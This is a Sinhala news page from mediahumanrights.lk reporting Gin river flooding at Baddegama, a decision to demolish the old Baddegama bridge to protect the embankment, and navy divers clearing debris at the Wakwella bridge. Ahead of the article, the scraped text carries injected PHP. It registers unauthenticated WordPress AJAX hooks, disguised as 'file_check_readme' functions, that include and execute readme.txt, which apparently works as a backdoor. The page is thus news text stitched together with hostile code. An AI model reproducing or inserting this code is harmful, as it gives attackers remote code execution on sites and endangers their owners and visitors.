if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } ගිං ගඟත් අවධානම් - බැම්ම රැක ගන්න පාලමක් කඩා ඉවත් කරන්න තීරණය කරයි - mediahumanrights.lk
mediahumanrights.lk
Local News News

ගිං ගඟත් අවධානම් – බැම්ම රැක ගන්න පාලමක් කඩා ඉවත් කරන්න තීරණය කරයි

ගිං ගඟ ද මේ වනවිට අවදානම් තත්ත්වයක පවතිනවා.
වාරිමාර්ග දෙපාර්තමේන්තුවේ දත්තවලට අනුව තවලම ප‍්‍රදේශයේදී එහි ජල මට්ටම සාමාන්‍ය මට්ටමට පැමිණ තිබුණත් බද්දේගම ප‍්‍රදේශයේදී එහි ජල මට්ටම තවමත් පවතින්නේ මහ ගංවතුර මට්ටමේ.
මේ අනුව ගිං ගඟේ වේලි ආරක්ෂා කර ගැනීම සඳහා වැලි කොට්ට යෙදීමට ද පටන් ගත් බව වාරිමාර්ග හා ජල සම්පත් කළමනාකරණ අමාත්‍ය විජිත් විජයමුණි ද සොයිසා පැවසුවා.
මේ අතර බද්දේගම පරණ පාලම කඩා ඉවත් කිරීමට තීරණය කර තිබෙනවා. බද්දේගම ප්‍රදේශයේ ජල මට්ටම තව දුරටත් ඉහළ ගනිමින් ඇති බවයි වාර්තා වෙන්නේ. ගිං ගඟේ ඉහළ කොටස් වන නෙළුව, තවලම, හිනිදුම ආදී ප්‍රදේශවල ජල මට්ටම බැස යාමත් සමගම මෙම තත්ත්වය බද්දේගමට බලපා තිබෙනවා. බද්දේගම නගරයේ ආරක්ෂාව සඳහා යොදවා ඇති යෝධ බැම්මේ ජල කාන්දු සිදු වෙමින් ඇති බවද සඳහන්. එම ස්ථානවලට වැලි කොට්ට ඇතිරීම සිදු කෙරෙන බවයි වාර්තා වෙනවා.
මෙම තත්ත්වය සොයා බැලීම සඳහා ස්වදේශ කටයුතු අමාත්‍ය වජිර අබේවර්ධන සහ රාජ්‍ය ඉංජිනේරුවන් පැමිණ සිටි බවද බද්දේගම නෙත් නිවුස් වාර්තාකරු සඳහන් කළා.
මේ අතර නාවික හමුදාව මේ වන විට ගාල්ල දිස්ත්‍රික්කයේ බද්දේගම වක්වැල්ල පාලමේ සිරවී ඇති අපද්‍රව්‍ය ඉවත් කිරීමේ මෙහෙයුම්වල නිරත වෙමින් සිටිනවා.
ගාල්ල දිස්ත්‍රික්කයේ පෝද්දල සහ තෙලිකඩ යා කරන වක්වැල්ල පාලමේ යට කොටස, පැවති ගංවතුර තත්ත්වය හේතුවෙන් මේ වන විට විශාල වශයෙන් අපද්‍රව්‍ය සහ දැව කඳන් සිරවී ජලය බැස යාමට නොහැකි තත්ත්වයට පත් වී ඇති බවයි වාර්තා වෙන්නේ.
ශ්‍රී ලංකා නාවික හමුදා විශේෂ යාත්‍රා බලඝණයට සහ මැරීන් බලකායට අනුයුක්ත නාවික බටයින් 73 දෙනෙකු එම ස්ථානය වෙත කඩිනමින් පිටත් කර යැවීමට නාවික හමුදාව කටයුතු කර තිබුණා.
වක්වැල්ල පාලම, ගාල්ල සහ බද්දේගම ප්‍රධාන මාර්ගය යා කරනු ලබන දකුණු පලාතේ ඇති දිගම පාලම ලෙස සැළකෙනවා.
බද්දේගම ප්‍රදේශයේ සහ ඒ අවට ජල ගැල්මක් ඇති වූ අවස්ථාවක ගාල්ල ප්‍රධාන මාර්ගය වෙත කඩිනමින් ඇතුල්වීම සඳහා ඇති පහසුම සහ ප්‍රධානතම පිවිසුම් මාර්ගය වන්නේ ද මෙම පාලමයි.
(under the courtesy of nethfm news web)

Related posts

කොළඹ ඩී.ඇස්. සේනානායක විද්‍යාලය 50ස් වන සංවත්සරය අභිමානවත් ලෙස සමරයි

Shiran Viraj

සංචාරකයෙකු කොළඹ වටේ ගෙනියන්න ත‍්‍රිවිලයක් ලක්‍ෂ එකහමාරක් අය කරලා..

Shiran Viraj

මං ජනාධිපති වුනාම ජපානය හා අත්වැල් බැදගන්නවා..- සජිත් ජපාන විදේශ ඇමතිට කියයි..

Shiran Viraj